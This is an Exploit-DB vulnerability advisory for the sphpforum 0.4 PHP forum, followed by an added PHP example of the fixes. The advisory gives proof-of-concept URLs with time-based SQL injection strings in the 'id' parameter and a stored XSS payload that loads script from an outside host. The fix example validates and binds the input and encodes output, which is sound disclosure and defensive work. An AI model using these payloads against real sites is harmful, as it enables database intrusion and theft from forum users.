sphpforum 0.4 – Multiple Vulnerabilities

  • Author: loneferret
    Date: 2012-08-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/20546/
  • # Author: loneferret of Offensive Security
    # Product: sphpforum
    # Version: 0.4 (older versions may be affected)
    # 
    # Software Download: http://sourceforge.net/projects/sphpforum/
    
    # Description:
    # Simple PHP Forum is a PHP-based forum/BBS board designed to be small, simple,
    # fast, and to allow easy integration into any existing web site.
    
    # Vulnerability:
    # Due to improper input sanitization, parameters are prone to SQL injection. Stored
    # cross-site scripting is also present in some forms.
    
    # PoC 1:
    # SQL Injection
    # Page: view_topic.php / view_profile.php?
    # Vulnerable param: 'id'
    # http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271
    # http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271
    
    # PoC 2:
    # Stored XSS
    # Page: create_topic.php
    # Vulnerable field: Topic
    # Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
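
A hardened form of the two input paths above, as an added example rather than code from sphpforum or the advisory author: the `topics` table, its columns and the function names are hypothetical, and an in-memory SQLite database (needs the PDO SQLite extension) stands in for the forum's MySQL backend. It validates and binds `id` instead of concatenating it into SQL, and HTML-encodes the Topic field when it is rendered.

```php
<?php
// Added example, not sphpforum code. Table, column and function names are
// hypothetical; SQLite in memory replaces the forum's MySQL database.
declare(strict_types=1);

function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE topics (id INTEGER PRIMARY KEY, topic TEXT)');
    // Constructed sample row: a topic title stored with the markup from PoC 2.
    $ins = $db->prepare('INSERT INTO topics (id, topic) VALUES (?, ?)');
    $ins->execute([50, '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>']);
    return $db;
}

// view_topic.php side: 'id' must be a positive integer. Anything else is
// rejected before a query is built, and the accepted value is bound, not
// concatenated. (A textual id, as in view_profile.php, would be bound with
// PDO::PARAM_STR in the same way.)
function fetch_topic(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, topic FROM topics WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Rendering side of the stored XSS: encode the Topic field on output so
// stored markup is displayed as text instead of being parsed by the browser.
function render_topic(array $row): string
{
    $title = htmlspecialchars($row['topic'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h1>' . $title . '</h1>';
}

$db = open_demo_db();
// The decoded 'id' value from PoC 1 fails integer validation.
var_dump(fetch_topic($db, "50' and sleep(10) and '1'='1"));
// A valid id returns the row; its title is emitted HTML-encoded.
echo render_topic(fetch_topic($db, '50')), "\n";
```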